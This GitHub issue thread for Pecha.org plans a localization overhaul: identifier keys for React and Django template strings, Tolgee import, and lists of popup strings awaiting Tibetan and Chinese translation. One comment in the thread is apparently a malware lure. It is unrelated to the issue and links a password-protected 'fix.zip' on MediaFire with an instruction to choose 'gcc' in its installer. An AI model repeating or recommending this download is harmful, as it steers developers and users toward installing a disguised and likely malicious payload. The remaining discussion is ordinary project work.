### ISSUE TITLE
RFC021:Revamp localization in pecha.org

### ISSUE THREAD

**Issue by Lungsangg** [OpenPecha/Pecha.org#301]
[solves RFW021 ](https://github.com/orgs/OpenPecha/projects/87/views/1?sliceBy%5Bvalue%5D=Iteration+3&pane=issue&itemId=76937512) 

**Description :** 

There are many strings in both react and django templates. They need to be extracted either in js or po file and apply unique identifier so that it can help integrate with tolgee as well as solve the issue of different meaning in Tibetan for one english string.

**Implementation steps :** 

***1. apply unique identifier to String js (js part)***

- [x] Apply identifier key to each language string

- [x] Extract and apply identifier key to each hard coded string and 

- [x] Apply context variable in language string

- [x] Import js file in tolgee

- [x] Integrate i18n with react js

***2. apply unique identifier to Django template file***

- [x] apply unique identifier to existing po file. (translator comment)
  - [x] apply unique identifier to python module strings in po file (70)

- [x] find solution for extracting variable and string together
 
- [x] extract hardcoded strings and apply unique identifier (file by file)
  - [x] number of strings in templates folder (55)
  - [x] number of strings in templates/registration (16)
  - [x] number of strings in templates/static (279)
 

- [x] apply unique identifier to the corresponding `msgid`
- [x] parse `Translators comment` as `msgid`, and `msgid` as `msgstr`
- [x] Import po file in tolgee

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by drupchen** [comment]
## Resolve:

I propose that this hebrew string is searched in the whole codebase and popup removed.

![Image](https://github.com/user-attachments/assets/4570769c-f20a-4fb1-99d3-11fec253f9a9)

@drupchen la, this popup is generating in different place with different messages, if we disable it ..... the previous two have been localized and would be of no use so in my opinion should we localize the remaining strings ? so that later wherever sefaria have put in place the popup, only with Tibetan strings will appear.

if above suggestions is good, then below are the strings that need to translate in Tibetan.

`Want to document a connection to another text?`
`Create a free account to do more on Pecha`
`Add interconnections & translations`
`Build & share source sheets`
`Get updates on new texts`
`Have your own translation of this text?`
`Create a free account to add it to the library & do more on Pecha`
`Build & share source sheets`
`Connect with other users`
`Want to connect with other Pecha users?`
`Create a free account to join the conversation`
`Follow your favorite creators`
`Build & share source sheets`
`Send messages`
`Want to return to this text?`
`Create a free account to do more on Pecha`
`View your reading history`
`Build & share source sheets`
`Make source sheets`

**Comment by drupchen** [comment]
jennifer has a deadline on the 17th this month. She will meet HHDL office people for fundraising, but she needs a decent ZH localization. we should prioritize the main strings from Figma, push them on Tolgee so they can update the translations.

objective for this deadline: more or less the 500 strings from Figma here:
https://docs.google.com/spreadsheets/d/1URSkT231eXvJeRA4nWREgXiUks3nt9NcPIYbcDhpZII/edit?gid=0#gid=0
